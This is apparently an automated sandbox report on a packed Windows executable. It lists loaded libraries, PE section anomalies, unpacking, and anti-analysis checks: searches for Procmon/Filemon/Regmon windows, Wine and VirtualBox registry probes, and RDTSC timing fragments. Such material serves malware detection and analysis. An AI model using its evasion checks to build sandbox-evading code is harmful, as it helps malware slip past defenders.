Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: z3IxCpcpg4.exe

Static file information: File size 2926592 > 1048576

Source: z3IxCpcpg4.exe

Static PE information: Raw size of xufdfdiy is bigger than: 0x100000 < 0x2a0c00

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: z3IxCpcpg4.exe, 00000000.00000002.2571237429.0000000005CE2000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Unpacked PE file: 0.2.z3IxCpcpg4.exe.f00000.0.unpack :EW;.rsrc :W;.idata :W;xufdfdiy:EW;kfvcltou:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;xufdfdiy:EW;kfvcltou:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: z3IxCpcpg4.exe

Static PE information: real checksum: 0x2ccbe5 should be: 0x2d4af1

Source: z3IxCpcpg4.exe	Static PE information: section name:
Source: z3IxCpcpg4.exe	Static PE information: section name: .rsrc
Source: z3IxCpcpg4.exe	Static PE information: section name: .idata
Source: z3IxCpcpg4.exe	Static PE information: section name: xufdfdiy
Source: z3IxCpcpg4.exe	Static PE information: section name: kfvcltou
Source: z3IxCpcpg4.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_3_0516754A push 0002C161h; ret	0_3_0516755B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_3_0516754A push 0002C161h; ret	0_3_0516755B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_3_0516754A push 0002C161h; ret	0_3_0516755B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_3_0516754A push 0002C161h; ret	0_3_0516755B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F37069 push es; retf	0_2_00F37074
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F3C990 push eax; mov dword ptr [esp], 5C5D5E5Fh	0_2_00F3C99E
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F1B324 push F3B900F4h; retf	0_2_00F1B32A
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_00F56C5D pushad ; retf	0_2_00F56C64
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7A4DF push ebp; mov dword ptr [esp], edi	0_2_05E77871
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7ADC6 push eax; mov dword ptr [esp], ebx	0_2_05E7ADC7
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7ADC6 push esi; mov dword ptr [esp], 5E7F40A4h	0_2_05E7ADCC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E78DC9 push edi; mov dword ptr [esp], ebx	0_2_05E7C01F
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7D5D3 push 0A4874C3h; mov dword ptr [esp], edi	0_2_05E7D5D8
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E74DD9 push edi; mov dword ptr [esp], 7CFB18ACh	0_2_05E75674
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7CDD9 push ebp; mov dword ptr [esp], ebx	0_2_05E7CDDB
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85DAA push edx; mov dword ptr [esp], 4F46585Ch	0_2_05E85DC3
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85DAA push edi; mov dword ptr [esp], 7D7258C4h	0_2_05E85E11
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85DAA push ecx; mov dword ptr [esp], esp	0_2_05E85E76
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7FDAC push edi; ret	0_2_05E7FDBB
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E76DAB push 5F631165h; mov dword ptr [esp], edx	0_2_05E77D70
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E795A9 push 13468B83h; mov dword ptr [esp], ebx	0_2_05E795BC
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85DB1 push edx; mov dword ptr [esp], 4F46585Ch	0_2_05E85DC3
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85DB1 push edi; mov dword ptr [esp], 7D7258C4h	0_2_05E85E11
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85DB1 push ecx; mov dword ptr [esp], esp	0_2_05E85E76
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E7FDBC push eax; mov dword ptr [esp], 5FF58091h	0_2_05E8672B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E77D83 push esi; mov dword ptr [esp], edx	0_2_05E78F81
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E72D8F push 13C28042h; mov dword ptr [esp], eax	0_2_05E733C6
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E74D96 push ecx; mov dword ptr [esp], 2CB40BB4h	0_2_05E7678B
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E74D96 push ebp; mov dword ptr [esp], edi	0_2_05E7B496
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85D90 push edx; mov dword ptr [esp], 4F46585Ch	0_2_05E85DC3
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Code function: 0_2_05E85D90 push edi; mov dword ptr [esp], 7D7258C4h	0_2_05E85E11

Source: z3IxCpcpg4.exe

Static PE information: section name: entropy: 7.976067853039972

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C37E7 second address: 10C37EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D5F1F second address: 10D5F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F83ACDAA9E6h 0x0000000a pop eax 0x0000000b jbe 00007F83ACDAA9F8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D61C6 second address: 10D61DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D61DD second address: 10D61E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D61E3 second address: 10D61ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F83ACE24F26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D633A second address: 10D6350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F1h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D6350 second address: 10D635B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F83ACE24F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D64BD second address: 10D64D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F83ACDAA9EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D64D5 second address: 10D64DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D662E second address: 10D6636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D678A second address: 10D67A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F83ACE24F2Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D67A2 second address: 10D67A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D81FE second address: 10D8291 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F83ACE24F28h 0x0000000e pop edx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F83ACE24F28h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D2E6Bh], ebx 0x00000030 mov dword ptr [ebp+122D2FE1h], edi 0x00000036 push 00000000h 0x00000038 cmc 0x00000039 push 35F3FCE3h 0x0000003e jmp 00007F83ACE24F38h 0x00000043 xor dword ptr [esp], 35F3FC63h 0x0000004a mov dword ptr [ebp+122D1D2Ah], eax 0x00000050 push 00000003h 0x00000052 add dword ptr [ebp+122D33FEh], edx 0x00000058 push 00000000h 0x0000005a mov cx, 8968h 0x0000005e xor dword ptr [ebp+122D1D03h], ecx 0x00000064 push 00000003h 0x00000066 mov dword ptr [ebp+122D33E7h], eax 0x0000006c push 8D8F3DF0h 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D8291 second address: 10D8295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D8446 second address: 10D844A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10D844A second address: 10D844E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F70E0 second address: 10F7113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F36h 0x00000009 jmp 00007F83ACE24F39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7113 second address: 10F711D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F83ACDAA9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F711D second address: 10F7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7128 second address: 10F712E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F712E second address: 10F7132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7434 second address: 10F7438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F75AD second address: 10F75B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F75B3 second address: 10F75C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9EAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F75C3 second address: 10F75D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F75D2 second address: 10F75D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F75D8 second address: 10F7607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F83ACE24F2Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F83ACE24F34h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7607 second address: 10F760B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F760B second address: 10F7611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7BA2 second address: 10F7BAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F83ACDAA9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7E67 second address: 10F7E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F7E6D second address: 10F7E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F86DB second address: 10F86F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F35h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F86F8 second address: 10F86FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F884F second address: 10F8879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F83ACE24F2Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8879 second address: 10F887D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F887D second address: 10F8899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F83ACE24F32h 0x0000000f jns 00007F83ACE24F26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8899 second address: 10F88DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F8h 0x00000009 pushad 0x0000000a jmp 00007F83ACDAA9EEh 0x0000000f jmp 00007F83ACDAA9F7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10F8A43 second address: 10F8A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F83ACE24F38h 0x0000000f jmp 00007F83ACE24F2Ch 0x00000014 jng 00007F83ACE24F26h 0x0000001a rdtsc
